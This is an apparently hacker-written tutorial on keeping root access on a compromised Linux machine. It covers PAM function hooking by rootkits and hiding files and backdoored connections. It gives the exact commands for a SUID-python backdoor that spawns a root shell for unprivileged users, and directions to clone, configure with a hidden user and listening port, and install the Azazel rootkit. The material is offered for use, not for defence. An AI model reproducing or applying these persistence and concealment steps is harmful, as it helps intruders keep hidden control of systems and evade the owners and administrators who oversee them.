Maintaining root access once it has been achieved is surprisingly easy. I‟ll go over function hooking in greater detail, but rootkits are created to hook pertinent functions. For example, the PAM Library (Pluggable Access Module) comes pre-compiled. After downloading the developer files (source code) and man pages, you can hook the functions with the correct parameters and see their return values. There are several functions that are incorporated into the login process, but hooking these functions and returning success values will allow you to log in as any account and become root. This was recreated, independently, by myself as well as, I‟m sure, several other times. Essentially, it allows you to log in as root while keeping extra entries to /etc/shadow or /etc/passwd.
There are several common hooks including those for one of several SSH functions to allow remote, root access to fake accounts. Some can hide files from the OS (such as the ld.so.preload file). Some can hide network connections from the kernel (IE: Netstat won‟t show an SSH or backdoored TCP connection). There are hundreds of uses for them.
Simple python method:
1. Since you have root access, you can add SUID to files.
2. Add SUID to a scripting engine. I prefer python:
chmod 4755 /usr/bin/python
This adds SUID to python so an unprivileged, non-root user can now execute python scripts as root.
3. Either write a script or open the python command line:
import os
os.setgid(0)
os.setuid(0)
Now, python is in full root and sudo group mode. Executing /bin/sh using system(“/bin/sh”) spawns a root shell from a non-root account.
Azazel:
Azazel is based on the Jynx rootkit which uses the LD_PRELOAD or ld.so.preload method I‟ve described. There is a python configuration file that I very much recommend that you change to your liking before installing it. You may download/install it:
git clone
https://github.com/chokepoint/azazel.git
After that, you‟ll see a config.py file. Edit it with the text editor of your choice and change the listening port, hidden user‟s name/password, desired modules, etc... Then execute the python file and you may need to run make && install to install the rootkit.
